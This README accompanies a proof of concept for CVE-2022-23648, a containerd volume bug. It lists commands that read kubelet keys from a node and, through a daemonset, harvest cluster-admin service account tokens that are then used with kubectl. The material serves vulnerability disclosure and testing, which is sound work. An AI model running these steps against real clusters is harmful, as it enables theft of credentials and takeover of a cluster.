## PoC for CVE-2022-23648

This is a proof of concept for [@_fel1x](https://twitter.com/_fel1x)'s CVE-2022-23648. Disclosure info [here](https://bugs.chromium.org/p/project-zero/issues/detail?id=2244), CVE info [here](https://github.com/containerd/containerd/security/advisories/GHSA-crp2-qrr5-8pq7) and a blog with some more information and mitigation ideas [here](https://blog.aquasec.com/cve-2022-23648-containerd-cri-plugin). The `Containerfile` has the info. needed, and you can change the target of the VOLUME to try out different paths.

Easiest way to show it working is to use [KinD](https://kind.sigs.k8s.io/docs/user/quick-start/) which has exploitable images.

## Basic Test procedure

Unless the node somehow has a lot of data in `/var/lib/kubelet/pki`, this should be a safe test.

- `kind create cluster --image=kindest/node:v1.21.1`
- `kubectl create -f pod-manifest.yaml`
- `kubectl exec poctest -- ls /var/lib/kubelet/pki/`

And if you get back files including `kubelet.key` it worked :)

## Try to escalate to cluster-admin

NOTE: **Do not attempt this on a production cluster.  A vulnerable Containerd may duplicate a lot of data into this attack pod and exhaust disk space. Also, this will print cluster-admin SA tokens to pod logs which are likely to get sent to a logging destination in plaintext**

This will run a daemonset that attempts to enumerate all Kubernetes service account tokens on the node and print it to the pod's logs if it's found to be a `cluster-admin` token.

- `kubectl apply -f ds.yaml`
- `kubectl --token="$(kubectl logs -l app=poctest | head -1)" auth can-i '*' '*' -A`

If `yes` is printed, congrats, you have a short-lived `cluster-admin` service account token, run: 

- `kubectl logs -l app=poctest | head -1 | awk -F\. '{print $2}' | base64 -d` to see which SA it is

- `kubectl --token="$(kubectl logs -l app=poctest | head -1)" get pods -A`
- `kubectl --token="$(kubectl logs -l app=poctest | head -1)" auth can-i --list`

## Author

- [Rory McCune @raesene](https://twitter.com/raesene)

## Contributors

- [@BradGeesaman](https://twitter.com/bradgeesaman) - Escalation Daemonset
